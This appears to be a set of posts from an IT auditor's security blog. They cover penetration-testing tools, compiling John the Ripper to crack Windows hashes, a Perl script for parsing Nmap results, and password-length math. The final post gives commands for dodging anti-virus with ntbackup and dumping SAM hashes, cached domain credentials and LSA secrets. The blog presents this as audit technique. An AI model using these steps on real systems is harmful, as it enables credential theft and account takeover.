I put together a Technical Assessment Plan that can be used to conduct external fingerprinting using the tools and utilities that a penetration tester would use. The assessment plans are structured in a way to help with the documentation of evidence for inclusion in a work-paper process. The plan provides helpful information on how to install, configure, and use the tools to obtain the evidence needed for an engagement. The Technical Assessment Plans that I have created can be found here.
Earning CPE credits in a down economy for your Information Security certifications.
As we enter 2011 the financial talking heads say that our economy is recovering. However, your company’s training budget does not reflect this recovery. Trips to security conferences in Las Vegas, Miami, and Orlando are all out of the question. With all of the information security certifications that you have obtained to keep competitive in this tough economy you are required to earn Continuing Professional Education (CPE) credits. Below I will list some simple steps you can take to still keep current on the latest security trends while earning those valuable CPE credits to maintain your certification.
A question was raised today during a presentation about what utilities you can use without installing them. There are engagements that the auditor is not allowed to use their own laptop and must use a laptop provided by the auditee. This severely limits how effective an engagement can be but it is not impossible to obtain the information you need when you connect to the auditee’s network. I’ve made changes to the Security Tools page to highlight which tools are stand-alone and do not require installation. Also for reference see Penetration Testing Ninjitsu which I pulled from a Core Security webcast.
NA CACS conference hosted by ISACA (18-22 April 2010)
Remote Security Testing for Web Applications
Presented by David Rhoades
Maven Security Consulting
Attending this conference workshop session introduced me to Maven Security’s Web Security Dojo. This is a virtual image, Ubuntu based, that includes several free and open source tools used for web application auditing. The image also includes web application environments that are vulnerable to many common vulnerabilities to allow you to test and learn how to use the tools. This pre-configured environment is perfect for educational purposes. They also include a BASH script that will setup your own Ubuntu environment.
9.19.2011 – Updated for latest openssl and john jumbo patch on Ubuntu Natty Narwhal 11.4
Password cracking Windows hashes on Linux using John the Ripper (JtR). If you prefer the Linux operating system JtR is the password cracking utility to use. By default JtR does not support the hashes that we are interested in cracking. See below for installation and patching instructions for JtR. Applying the patch to JtR adds the functionality to crack NTLM and MS-Cache passwords. NOTE: This install was done on Ubuntu 10.4 LTS but should work on any Linux system since we are compiling from source.
$./john --format=mscash --rules --wordlist=<PASSWORD_LIST> <CACHE_HASH_FILE>
$./john --format=nt --rules --wordlist==<PASSWORD_LIST> <NTLM_HASHE_FILE>
For additional information you can read the JtR documentation and wiki from Openwall.
OpenSSL is needed. This can be installed through your package manager or may already be installed. Remember to install the development package (libssl-dev or libssl-devel). Instructions on download and compile are included below.
JtR 1.7.8
$ wget http://www.openssl.org/source/openssl-1.0.0e.tar.gz
$ tar zxvf openssl-1.0.0e.tar.gz
$ cd openssl-1.0.0e
$ ./config --openssldir=/usr/local
$ make
$ sudo make install
$ wget http://www.openwall.com/john/g/john-1.7.8-jumbo-5.tar.gz
$ tar zxvf john-1.7.8-jumbo-5.tar.gz
$ cd john-1.7.8-jumbo-5/
$ cd src/
$ make linux-x86-64
$ sudo make install
JtR 1.7.7
$ wget http://www.openssl.org/source/openssl-1.0.0d.tar.gz
$ tar zxvf openssl-1.0.0d.tar.gz
$ cd openssl-1.0.0d
$ ./config --openssldir=/usr/local
$ make
$ sudo make install
$ cd ..
$ wget http://download.openwall.net/pub/projects/john/1.7.7/john-1.7.7.tar.gz
$ tar zxvf john-1.7.7.tar.gz
$ cd john-1.7.7/
$ wget http://download.openwall.net/pub/projects/john/1.7.7/john-1.7.7-jumbo-6.diff.gz
$ gzip -d john-1.7.7-jumbo-6.diff.gz
$ patch -p1 < john-1.7.7-jumbo-6.diff
$ cd src/
$ make linux-x86-sse2
John will be found in the run directory.
As an auditor I liked to quickly analyze my Nmap scan results by parsing the XML output produced and loading it into my favorite spreadsheet application.
From there I could sort by host, port, service, or operating system for analysis. The parsed results are a lot easier to add to reports and workpapers. Just remember to keep the original Nmap results.
I’ve developed a LAMP framework to parse and load Nmap results into a database for reporting and analysis. However if you are just looking to quickly parse the results of individual scans I’ve got a Perl script for you!
First a quick blurb on getting installing Perl and and Nmap-Parser module.
Windows
Download ActivePerl from the Active State website: https://www.activestate.com/activeperl/downloads/
Once ActivePerl is installed you will need to install the Nmap Parser written by Anthony Persaud.
From the Command Prompt enter the following command:
C:\>ppm install nmap-parser
Downloading Nmap-Parser-1.19...done
Downloading XML-Twig-3.32...done
Unpacking Nmap-Parser-1.19...done
Unpacking XML-Twig-3.32...done
Generating HTML for Nmap-Parser-1.19...done
Generating HTML for XML-Twig-3.32...done
Updating files in site area...done
21 files installed
Linux
For Ubuntu/Debian you can install the package.
#apt-get install libnmap-parser-perl
For every Linux distro you can install the package via CPAN.
#perl -MCPAN -e 'install Nmap::Parser'
Copy the following Perl code below and save it as nmap_parse.pl.
#!/usr/bin/perl
use Nmap::Parser;
my $np = new Nmap::Parser;
my $infile = @ARGV[0];
$np->parsefile($infile);
#GETTING SCAN INFORMATION
print "Scan Information:\n";
my $si = $np->get_session();
print
'Number of services scanned: '.$si->numservices()."\n",
'Start Time: '.$si->start_str()."\n",
'Finish Time: '.$si->time_str()."\n",
'Scan Arguments: '.$si->scan_args()."\n";
print "Host Name,Ip Address,MAC Address,OS Name,OS Family,OS Generation,OS Accuracy,Port,Service Name,Service Product,Service Version,Service Confidence\n";
for my $host ($np->all_hosts()){
for my $port ($host->tcp_ports()){
my $service = $host->tcp_service($port);
my $os = $host->os_sig;
print $host->hostname().",".$host->ipv4_addr().",".$host->mac_addr().",".$os->name.",".$os->family.",".$os->osgen().",".$os->name_accuracy().",".$port.",".$service->name.",".$service->product.",".$service->version.",".$service->confidence()."\n";
}
}
Save the above code and run it from the command line as follows:
C:\>nmap_parse.pl nmap_scan_output.xml >> results.csv
Additional Information
ppm – Perl Package Manager, version 4
http://docs.activestate.com/activeperl/5.10/bin/ppm.html
ActiveState CPAN PPM Repository
http://ppm4.activestate.com/
Nmap Parser
http://search.cpan.org/dist/Nmap-Parser/Parser.pm
Take this hypothetical scenario (Okay, it really wasn’t hypothetical at the time). You recommend to your client that minimum 8 character passwords should be enforced but they want a minimum of 6 character passwords and instead they will enforce password complexity (alphanumeric and special characters).
As auditors we like to have facts to back-up our recommendations. What better fact than simple math.
Password strength in relation to the number of guesses an attacker needs to brute force the password is represented by the number of characters available to choose from raised to the power of the length of the password.
N^x
N = number of characters available
x = length of the password.
Lets do some simple math for six character passwords vs eight character passwords. We will even have complex passwords for the six character password and simpler passwords requirements for the eight character password.
If an individual was required to have all 4 character strength requirements (uppercase and lowercase letters, numbers, and special characters) and had a six character password we can compute how many guesses you would need to crack the password.
Upper alpha = 26
Lower alpha = 26
Number = 10
Special Char = 32
Note: Special character support depends on the system. In this example we are going with what Windows supports for passwords ()`~!@#$%^&*-+=|\{}[]:;”‘<>,.?/ and space. Also of note is Windows supports 65,000 additional Unicode characters but we will keep it to symbols found on the keyboard. Other systems do not support as many special characters as Windows.
94^6 = 689,869,781,056 (690 billion guesses).
Now we take a password with only upper and lowercase password requirements but make it an eight character minimum requirement.
Upper alpha = 26
Lower alpha = 26
52^8 = 53,459,728,531,456 (53.5 trillion guesses).
As you can see the eight character password, with few character requirements, has 74 times more choices than a “complex” six character password.
How about some computational proof! I use Cain & Abel to show how long it would take to bruteforce the example above with an NTLM (local windows account) hash and a MS-Cache hash (domain windows account). Note: Brute force attempts also depend on the complexity of the encryption method used. You will see that the complexity for an MS-Cache password is greater than NTLM.
NTLM six character, alphanumeric and special characters (here).
NTLM eight character, alpha characters (here).
MS-Cache six character, alphanumeric and special characters (here).
MS-Cache eight character, alpha characters (here).
You can see from the computational results from Cain & Abel show that it takes about 80 times longer to brute force the less complex eight character password compared to the more complex six character password.
An auditor’s interest in the Windows NTBACKUP Utility extends beyond examining their DR/BCP plan.
Suppose you just got command prompt access to a server (example tutorial 1, 2, & 3) but the host has anti-virus installed and you can’t disable it. You can’t use your trusty pwdump2 to dump the local password hashes (the same utility that SQLAT and SQLNINJA use). No problem, just use the ntbackup utility to make a current backup of the registry (including SAM and SYSTEM keys).
C:\>ntbackup backup systemstate /j "Auditor Owns Your Hashes" /f "%systemroot%\temp\%Username%SysState.bkf" /a
C:\>del "c:%systemroot%\temp\%Username%SysState.bkf"
You don’t need the backup file you created so it can be deleted (C:\>del %systemroot%\temp\%Username%SysState.bkf). When a backup is done of the systemstate the files in the %systemroot%\repair folder are updated. Copy the sam, system, and security files from %systemroot%\repair.
Once those files are obtained you can use the command line utilities from the creddump project to produce the same files obtained form PWDumpX (see tuturial).
Python needs to be installed for creddump to work.
Python version 2.5.4 from http://www.python.org/download/releases/2.5.4/
Pycrypto version 2.0.1 from http://jintoreedwine.com/files_and_stuff/pycrypto-2-0-1.zip
C:\creddump-0.1>pwdump.py SYSTEM SAM >> PWHashes.txt
C:\creddump-0.1>lsadump.py SYSTEM SECURITY >> LSASecrets.txt
C:\creddump-0.1>cachedump.py SYSTEM SECURITY >> PWCache.txt
Using RainbowCrack and the rainbowtables obtained from The Schmoo Group you will be able to obtain the passwords to any local account with a password 14 characters or less from PWHashes.txt.
See this tuturial on how to dictionary attack the passwords obtained from the PWCache.txt file.
You can review the LSASecrets.txt file to obtain plain text passwords for Windows service accounts. Often these accounts are also Domain accounts with the same password or even Domain Administrator accounts.
